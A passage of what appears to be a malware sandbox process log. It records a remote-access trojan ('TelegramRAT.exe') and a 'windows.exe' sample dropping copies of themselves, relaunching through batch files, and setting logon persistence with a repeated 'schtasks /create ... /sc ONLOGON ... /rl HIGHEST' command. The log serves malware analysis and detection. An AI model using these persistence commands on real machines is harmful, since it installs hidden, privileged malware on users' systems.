        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GMoR1Zp9v0V6.bat" "
        11⤵
        
        PID:3732
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:2512
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:768
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3828
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\esWM2WuDQRP1.bat" "
        13⤵
        
        PID:4460
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:4340
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1624
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1412
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zVgNa5wvi6db.bat" "
        15⤵
        
        PID:4756
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:4344
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3348
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3228
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8heIvktVv0l4.bat" "
        17⤵
        
        PID:1488
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:4464
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:460
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:400
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9wPBsthyHp3b.bat" "
        19⤵
        
        PID:3036
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:732
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:436
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4792
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SCu9qLAhcQvo.bat" "
        21⤵
        
        PID:4664
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:4952
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:524
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4708
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q9Gq3hZJt2TT.bat" "
        23⤵
        
        PID:5096
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:3184
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3500
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3724
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n9OwpFM7pw9g.bat" "
        25⤵
        
        PID:2588
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:4028
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3068
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3300
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vl8R8kMDOk9H.bat" "
        27⤵
        
        PID:1232
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:816
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4776
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2692
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        29⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\M3E5ruYIHMc6.bat" "
        29⤵
        
        PID:512
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:4748
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3236
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3776
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        31⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SNm1KA8DKqUA.bat" "
        31⤵
        
        PID:1092
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:736
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:768
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        32⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3596
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        33⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2436

C:\Users\Admin\Desktop\windows.exe
"C:\Users\Admin\Desktop\windows.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4924
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3304
- C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
  "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RRoOVQ5qFm1D.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1188
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2544
  - - C:\Windows\system32\PING.EXE
      ping -n 10 localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3208
  - - C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3512
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EZo7kO1ldmNB.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4312
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:3044
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3652
      - C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2568
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tPnTu9Py2p2G.bat" "
        7⤵
        
        PID:1944
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:3180
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2352
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:796
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8Y53nICWtruC.bat" "
        9⤵
        
        PID:1088
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:2888
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2284
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3252
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GlKdAVy7hM3f.bat" "
        11⤵
        
        PID:3340
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:1488
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4920
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1592
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1vfkIDbESRsh.bat" "
        13⤵
        
        PID:4676
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:4452
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3580
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2156
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jxz2yIelTXWr.bat" "
        15⤵
        
        PID:316
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:624
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1984
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3360
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5KZgBcgSvLuD.bat" "
        17⤵
        
        PID:4068
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:4756
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4852
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:228
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8Aoip4t1U7Fz.bat" "
        19⤵
        
        PID:1488
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:2176
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4920
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5104
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1e5eMBSN4JBf.bat" "
        21⤵
        
        PID:1804
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:1232
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:436
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4560
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZzvkP1snCJbp.bat" "
        23⤵
        
        PID:1344
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:864
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4756
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GHHmn7tThWpi.bat" "
        25⤵
        
        PID:2948
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:4840
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1812
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1508
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WOvNStLhAcCa.bat" "
        27⤵
        
        PID:3712
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:4520
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4072
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        29⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ufQl2KHUBQfA.bat" "
        29⤵
        
        PID:4808
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:1592
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4992

C:\Users\Admin\Desktop\TelegramRAT.exe
"C:\Users\Admin\Desktop\TelegramRAT.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8166.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp8166.tmp.bat
  2⤵
  PID:4880
- - C:\Windows\system32\tasklist.exe
    Tasklist /fi "PID eq 5040"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3500
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:5024
- - C:\Windows\system32\timeout.exe
    Timeout /T 1 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:408
- - C:\Users\yanak\yanak.exe
    "yanak.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:216

C:\Users\Admin\Desktop\windows.exe
"C:\Users\Admin\Desktop\windows.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1616
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2156
- C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
  "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4028
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pdsHTRvIhfd4.bat" "
    3⤵
    PID:3708
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2828
  - - C:\Windows\system32\PING.EXE
      ping -n 10 localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2588
  - - C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2404
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fv6Wd3Zp90fj.bat" "
        5⤵
        
        PID:508
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
